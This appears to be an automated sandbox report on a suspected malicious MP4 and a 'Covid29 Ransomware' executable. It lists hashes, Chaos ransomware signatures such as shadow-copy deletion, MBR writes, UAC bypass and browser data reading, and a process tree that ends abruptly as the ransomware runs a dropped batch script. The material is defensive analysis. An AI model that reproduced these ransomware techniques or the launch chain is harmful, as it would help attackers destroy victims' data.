Analysis

  • max time kernel
    425s
  • max time network
    426s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-12-2024 14:37

Errors

Reason
Machine shutdown

General

  • Target

    Sols RNG [Eon 1-1] - ROLLING OBLIVION IN GLITCH BIOME!!! (WITH REACTION) 480.mp4

  • Size

    8.1MB

  • MD5

    7a922dc11e75f0a29f8301a7c7618c2b

  • SHA1

    a147bf976557d00e7bf0dcbaf7e43fec5277d9e6

  • SHA256

    b20976ed9b7d2c8cab61375a83d302258858ee57b5f497a431763b1a8e9ca2dc

  • SHA512

    48e08ab89618b6eb4ef86929e5e176d103d9c28909cfeaa47e457e7a7233f2cf1886bcb07abd38dbddf7fae5b224312a8112061ec994b9a38e6980f1ed8c921b

  • SSDEEP

    196608:HsIcL0wGqPi/xOuRu40kE/afekLeZl4zuKQXlRSqesHnaE+YR:HHwbKc4FE/a3Sl1Xnx6EP

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • Chaos family
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • A potential corporate email address has been identified in the URL: [email protected]
  • A potential corporate email address has been identified in the URL: [email protected]
  • A potential corporate email address has been identified in the URL: [email protected]
  • A potential corporate email address has been identified in the URL: [email protected]
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive profile data.

  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Probable phishing domain 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\Sols RNG [Eon 1-1] - ROLLING OBLIVION IN GLITCH BIOME!!! (WITH REACTION) 480.mp4"
    1⤵
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:324
    • C:\Windows\SysWOW64\unregmp2.exe
      "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\system32\unregmp2.exe
        "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
        3⤵
        • Enumerates connected drives
        • Suspicious use of AdjustPrivilegeToken
        PID:1864
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
    1⤵
    • Drops file in Windows directory
    PID:816
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x498 0x510
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1468
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1460
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8688a46f8,0x7ff8688a4708,0x7ff8688a4718
      2⤵
        PID:2276
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        2⤵
          PID:1872
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:8
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
          2⤵
            PID:2428
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
            2⤵
              PID:1428
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
              2⤵
                PID:444
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
                2⤵
                  PID:4852
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:1
                  2⤵
                    PID:2652
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
                    2⤵
                      PID:708
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3160
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
                      2⤵
                        PID:4588
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
                        2⤵
                          PID:2096
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:1
                          2⤵
                            PID:4384
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
                            2⤵
                              PID:2340
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
                              2⤵
                                PID:3728
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
                                2⤵
                                  PID:4672
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1
                                  2⤵
                                    PID:4424
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                    2⤵
                                      PID:3984
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
                                      2⤵
                                        PID:2368
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
                                        2⤵
                                          PID:4672
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
                                          2⤵
                                            PID:4972
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
                                            2⤵
                                              PID:3076
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2168 /prefetch:1
                                              2⤵
                                                PID:3512
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:1
                                                2⤵
                                                  PID:4672
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
                                                  2⤵
                                                    PID:3128
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
                                                    2⤵
                                                      PID:904
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
                                                      2⤵
                                                        PID:2084
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5932 /prefetch:8
                                                        2⤵
                                                          PID:876
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
                                                          2⤵
                                                            PID:3752
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
                                                            2⤵
                                                              PID:3148
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                                                              2⤵
                                                                PID:3800
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
                                                                2⤵
                                                                  PID:3760
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:1
                                                                  2⤵
                                                                    PID:4752
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
                                                                    2⤵
                                                                      PID:3904
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
                                                                      2⤵
                                                                        PID:2192
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
                                                                        2⤵
                                                                          PID:4924
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:1
                                                                          2⤵
                                                                            PID:3544
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7160 /prefetch:1
                                                                            2⤵
                                                                              PID:4416
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8
                                                                              2⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2724
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7304 /prefetch:8
                                                                              2⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2376
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7240 /prefetch:8
                                                                              2⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:3260
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
                                                                              2⤵
                                                                                PID:5180
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7312 /prefetch:1
                                                                                2⤵
                                                                                  PID:5188
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
                                                                                  2⤵
                                                                                    PID:5664
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
                                                                                    2⤵
                                                                                      PID:5672
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,1681191129551080298,244235784428721876,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7428 /prefetch:2
                                                                                      2⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:5956
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2052
                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4880
                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                        1⤵
                                                                                          PID:2540
                                                                                        • C:\Users\Admin\Downloads\Covid29 Ransomware (1)\TrojanRansomCovid29.exe
                                                                                          "C:\Users\Admin\Downloads\Covid29 Ransomware (1)\TrojanRansomCovid29.exe"
                                                                                          1⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2212
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\TrojanRansomCovid29.bat" "
                                                                                            2⤵
                                                                                            • Checks computer location settings
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Modifies registry class
                                                                                            PID:3224
                                                                                            • C:\Windows\SysWOW64\WScript.exe
